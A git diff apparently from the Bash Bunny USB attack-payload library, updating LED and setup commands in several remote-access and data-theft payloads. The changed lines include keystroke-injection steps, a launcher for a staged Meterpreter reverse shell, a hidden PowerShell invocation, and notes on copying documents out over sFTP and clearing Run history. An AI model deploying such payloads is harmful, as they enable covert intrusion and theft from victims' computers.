a/payloads/library/remote_access/USB_Intruder/payload.txt +++ b/payloads/library/remote_access/USB_Intruder/payload.txt @@ -17,12 +17,13 @@ #Green - Attack Completion #Initialization - Setting AttackModes -LED W +LED SETUP ATTACKMODE HID STORAGE +GET SWITCH_POSITION #Initialization Completed #Beginning of HID/STORAGE Phase -LED B 10 +LED ATTACK #Description:: Q DELAY 2000 Q GUI d @@ -61,7 +62,7 @@ Q DELAY 500 #End of HID/STORAGE Phase #Cleanup -LED Y 100 +LED CLEANUP #Clears complete run history Q GUI r Q DELAY 500 @@ -70,7 +71,6 @@ Q ENTER #End of Cleanup #Completion of script -LED G 100 sync -LED G +LED FINISH #Completed diff --git a/payloads/library/remote_access/Win_x64_JS_Rev_Meter/payload.txt b/payloads/library/remote_access/Win_x64_JS_Rev_Meter/payload.txt index 4c6300e6..d4b81ea2 100644 --- a/payloads/library/remote_access/Win_x64_JS_Rev_Meter/payload.txt +++ b/payloads/library/remote_access/Win_x64_JS_Rev_Meter/payload.txt @@ -3,7 +3,6 @@ LED G REM set attackmode to HID device ATTACKMODE HID REM set keyboard -DUCKY_LANG us REM open run menu Q GUI r Q DELAY 1000 diff --git a/payloads/library/remote_access/WindowsMeterpreterStaged/payload.txt b/payloads/library/remote_access/WindowsMeterpreterStaged/payload.txt index 2621808c..0e315c4b 100755 --- a/payloads/library/remote_access/WindowsMeterpreterStaged/payload.txt +++ b/payloads/library/remote_access/WindowsMeterpreterStaged/payload.txt @@ -29,20 +29,19 @@ # Red: failure to load dependency ducky script # +LED SETUP + +GET SWITCH_POSITION ATTACKMODE HID -LED R G 200 - -LANGUAGE='us' - -source bunny_helpers.sh +LED ATTACK if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt" ]; then QUACK ${SWITCH_POSITION}/windows-staged-meterpreter.txt - LED G + LED FINISH else - LED R + LED FAIL echo "Unable to load dwindows-staged-meterpreter.txt" >> /root/debuglog.txt exit 1 fi diff --git a/payloads/library/sFTP Directory Grabber/payload.txt b/payloads/library/sFTP Directory Grabber/payload.txt index 228a7aed..e7d956b1 100644 --- a/payloads/library/sFTP Directory Grabber/payload.txt +++ b/payloads/library/sFTP Directory Grabber/payload.txt @@ -6,7 +6,7 @@ # Version: 1.0 # Target: Windows 7+ # NOTICE: HAK5 is not responsible for the execution of 3rd party binaries! -# +# # Copies psFTP.exe from the Bash Bunny USB Mass Storage root directory to %TEMP% and then executes with parameters in the e.cmd. # e.cmd is excuted invisibly using i.vbs # which in turn copies psftp.exe from the root of the Bash Bunny and then executes it @@ -16,16 +16,15 @@ # SET lootfrom=c:\users\username\documents # SET looto=/loot # -#IMPORTANT: +#IMPORTANT: #To Download psftp.exe please use one of the links below: #32-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w32/psftp.exe #64-Bit Version: https://the.earth.li/~sgtatham/putty/latest/w64/psftp.exe #Once downloaded, please copy psFTP.exe to the root of the bash bunny before attempting to use this payload. # -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh -LED R +LED SETUP +GET SWITCH_POSITION ATTACKMODE HID STORAGE QUACK GUI r QUACK DELAY 100 @@ -33,4 +32,4 @@ QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'pa QUACK ENTER # Green LED for finished -LED G +LED FINISH